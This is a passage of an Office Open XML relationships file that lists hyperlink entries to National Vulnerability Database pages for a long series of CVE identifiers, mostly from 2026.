Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92867" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92870" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92871" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102121" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102454" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103239" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103398" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97150" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102511" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10739" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94115" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94177" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97287" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97293" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76146" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103237" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103321" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46711" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100273" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102984" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102990" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93621" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96817" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100255" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102101" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102126" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103432" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103473" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51568" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51570" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87004" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93994" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100256" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101885" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102112" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102113" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102118" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47489" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47491" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47493" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47494" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47495" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47497" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47498" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47499" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47500" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47501" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47502" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47503" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47504" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47505" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47507" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47508" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47510" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47511" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47512" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47513" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47514" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47516" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47519" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47520" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47521" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47523" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47528" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47530" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47535" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47536" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47540" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47541" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47545" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47548" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47550" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47551" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47552" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47553" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47556" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47558" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47559" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47560" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47561" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47563" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47569" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47570" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47571" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47572" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47573" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47574" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47575" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47577" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47578" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47579" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47583" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47585" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47587" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47588" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47589" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47590" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47591" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47592" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47593" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47594" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47595" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47597" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47599" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47600" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47601" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53605" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62146" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100266" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100268" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47576" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100262" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19553" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55177" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62085" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62097" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94082" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96345" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96346" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96827" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96828" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54402" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54403" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58387" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101884" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102091" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102128" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102143" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102717" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103472" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103591" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6806" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75098" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76145" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80276" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85532" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89294" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92121" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92245" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94002" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94120" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94123" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94178" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95587" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95616" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96348" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96818" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96823" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97197" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97240" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97241" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97244" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102123" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103446" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101295" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103229" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103231" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103530" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103536" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47496" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47580" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76143" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102089" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102093" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102094" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102096" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 